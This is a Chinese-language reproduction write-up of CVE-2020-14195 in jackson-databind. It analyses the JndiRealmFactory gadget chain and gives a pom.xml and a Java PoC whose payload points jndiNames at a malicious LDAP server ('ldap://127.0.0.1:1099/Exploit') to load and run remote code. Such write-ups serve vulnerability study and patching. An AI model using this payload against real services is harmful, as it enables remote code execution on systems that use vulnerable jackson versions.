(CVE-2020-14195)FasterXML jackson-databind 反序列化漏洞
一、漏洞简介
利用条件开启enableDefaultTyping()
使用了org.jsecurity.realm.jndi.JndiRealmFactory
第三方依赖
二、漏洞影响
jackson-databind before 2.9.10.4jackson-databind before 2.8.11.6jackson-databind before 2.7.9.7
三、复现过程
漏洞分析
首先定位到org.jsecurity.realm.jndi.JndiRealmFactory
类,之后发现一处可疑的JNDI注入:1.png参数name
来自i\$,而i$
源自jndiNames
,此时要想进入lookup
需要满足前面的if条件语句,即jndiNames
不为空,且不为null
,所以我们可以在构造poc时直接对jndiName
进行传参赋值操作即可,同时将其设置为我们的ldap恶意服务:2.png整个利用链如下所示:
mapper.readValue
->setJndiNames
->getRealms
->lookup
漏洞复现
pom.xml如下:
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.4</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.jsecurity/jsecurity -->
<dependency>
<groupId>org.jsecurity</groupId>
<artifactId>jsecurity</artifactId>
<version>0.9.0</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>
漏洞POC:
package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String payload = "[\"org.jsecurity.realm.jndi.JndiRealmFactory\",{\"jndiNames\":\"ldap://127.0.0.1:1099/Exploit\"}]";
try {
Object obj = mapper.readValue(payload, Object.class);
mapper.writeValueAsString(obj);
} catch (IOException e) {
e.printStackTrace();
}
}
}
之后运行该程序,成功执行命令,弹出计算器:
3.png
参考链接
https://xz.aliyun.com/t/8012#toc-18